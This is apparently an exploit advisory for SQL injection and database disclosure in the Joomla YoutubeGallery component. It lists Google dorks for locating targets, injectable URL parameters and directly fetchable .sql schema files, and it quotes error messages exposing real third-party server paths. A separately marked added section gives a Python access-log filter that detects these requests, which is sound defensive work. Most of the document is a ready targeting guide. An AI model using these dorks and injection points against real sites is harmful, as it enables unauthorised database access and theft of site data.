- ########################################################################################
- # Exploit Title : Joomla YoutubeGallery Components 4.5.8 Database Disclosure and SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 18/01/2019
- # Vendor Homepage : joomlaboat.com
- # Software Information Links : extensions.joomla.org/extension/youtube-gallery/
- joomlaboat.com/en/youtube-gallery
- # Software Download Link : joomlaboat.com/images/extensions/youtubegallery_free_4.5.8.zip
- # Software Vulnerable Source Codes :
- github.com/joomlagovbr/joomla-3.x/tree/master/administrator/components/com_youtubegallery/sql/updates/mysql
- github.com/joomlagovbr/joomla-3.x/tree/master/administrator/components/com_youtubegallery/sql
- # Software Affected Versions : 4.5.8 and previous versions
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_youtubegallery''
- inurl:''/administrator/components/com_youtubegallery/''
- # Previous Version : 4.1.7 CVE Details =>
- nvd.nist.gov/vuln/detail/CVE-2014-4960 - cvedetails.com/cve/CVE-2014-4960/
- # CVE : CVE-2014-4960
- # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
- CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
- CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
- CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
- ########################################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_youtubegallery&view=gallery&layout=custom&Itemid=[SQL Injection]
- /index.php?option=com_youtubegallery&view=gallery&Itemid=[SQL Injection]
- /index.php?option=com_youtubegallery&view=gallery&Itemid=[ID-NUMBER]&videoid=[SQL Injection]
- /index.php?option=com_youtubegallery&view=youtubegallery&Itemid=[ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]=[SQL Injection]
- /index.php?option=com_youtubegallery&view=gallery&Itemid=[ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]&lang=[SQL Injection]
- /index.php?option=com_youtubegallery&view=youtubegallery&galleryid=[ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]&tmpl=[SQL Injection]
- /index.php?option=com_youtubegallery&view=youtubegallery&Itemid=[ID-NUMBER]&galleryid=[ID-NUMBER]&videoid=[SQL Injection]
- /index.php?option=com_easy_youtube_gallery&view=videos&mycategory=[ID-NUMBER]&defaultvideo=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_youtubegallery&view=youtubegallery&listid=[ID-NUMBER]&themeid=[ID-NUMBER]'&videoid=[YOUTUBE-VIDEO-ID-NUMBER]&tmpl=component&TB_iframe=true&height=[ID-NUMBER]&width=[SQL Injection]
- ########################################################################################
- # Database Disclosure Exploit :
- ***************************
- /administrator/components/com_youtubegallery/sql/install.mysql.utf8.sql
- /administrator/components/com_youtubegallery/sql/uninstall.mysql.utf8.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/0.0.1.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/1.2.1.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/1.2.2.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/1.2.3.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/1.2.5.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/1.3.3.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/1.3.5.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/1.3.6.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/1.3.7.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/2.0.0.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/2.1.0.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/2.1.3.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/2.1.4.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/2.2.0.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/2.2.7.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/2.2.9.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/2.3.0.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.0.0.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.0.6.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.1.3.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.1.5.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.1.8.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.2.4.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.2.7.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.3.6.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.3.7.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.3.9.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.4.8.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.5.7.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.5.8.sql
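Added example (not part of the original advisory): a Python filter for web-server access logs that flags the two request patterns listed above, namely the component's .sql files being fetched and com_youtubegallery requests whose parameters carry a quote or a non-numeric ID. Treating the parameters the advisory writes as [ID-NUMBER] as integer-only, the combined log format, and the constructed sample lines are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory writes as [ID-NUMBER]; treating them as
# integer-only is an assumption of this example.
INT_PARAMS = {"Itemid", "galleryid", "listid", "themeid", "height"}
SQL_FILE = re.compile(
    r"^/(?:.*/)?administrator/components/com_youtubegallery/sql/.*\.sql$", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def classify(log_line):
    """Return the findings for one combined-format access-log line."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    target, status = m.groups()
    parts = urlsplit(target)
    findings = []
    if SQL_FILE.match(parts.path):
        # A 200 means the schema file was actually handed out.
        findings.append("sql-file-served" if status == "200" else "sql-file-probe")
    params = parse_qsl(parts.query, keep_blank_values=True)  # decodes %27
    if ("option", "com_youtubegallery") in params:
        for name, value in params:
            if name in INT_PARAMS and not (value.isascii() and value.isdigit()):
                findings.append("non-integer:" + name)
            elif "'" in value:
                findings.append("quote:" + name)
    return findings

def scan(lines):
    """Map 1-based line number to findings, skipping clean lines."""
    return {n: f for n, line in enumerate(lines, 1) if (f := classify(line))}

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Jan/2019:10:00:01 +0000] "GET /index.php?option=com_youtubegallery&view=gallery&Itemid=48 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [18/Jan/2019:10:00:02 +0000] "GET /index.php?option=com_youtubegallery&view=gallery&Itemid=48%27 HTTP/1.1" 500 312',
    '203.0.113.7 - - [18/Jan/2019:10:00:03 +0000] "GET /index.php?option=com_youtubegallery&view=gallery&Itemid=48&videoid=1%27 HTTP/1.1" 200 4980',
    '198.51.100.9 - - [18/Jan/2019:10:00:04 +0000] "GET /administrator/components/com_youtubegallery/sql/install.mysql.utf8.sql HTTP/1.1" 200 2048',
    '198.51.100.9 - - [18/Jan/2019:10:00:05 +0000] "GET /administrator/components/com_youtubegallery/sql/updates/mysql/2.1.3.sql HTTP/1.1" 403 199',
]

if __name__ == "__main__":
    for n, found in scan(SAMPLE_LOG).items():
        print(n, found)
```

A "sql-file-served" finding means the web server is handing out the component's schema files and direct access to that directory should be denied; "sql-file-probe" shows the request was already refused.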
- ########################################################################################
- # Example Vulnerable Sites :
- *************************
- ########################################################################################
- # Example SQL Database Error :
- Strict Standards: Only variables should be assigned by reference in /home/medealab/public_html/senscience/plugins/system/rokbox/rokbox.php on line 51
- Deprecated: Non-static method VideoSource_YouTube::extractYouTubeID() should not be called statically, assuming $this from incompatible context in /home/medealab/public_html/senscience/components/com_youtubegallery/includes/misc.php on line 198
- Warning: DOMDocument::load(http://gdata.youtube.com/feeds/api/videos/RLz2k-oAhPo) [domdocument.load]: failed to open stream: HTTP request failed! HTTP/1.0 410 Gone in /usr/home/gurjiysp/data/www/hitech-stroy.ck.ua/components/com_youtubegallery/models/gallery.php on line 145
- ########################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ########################################################################################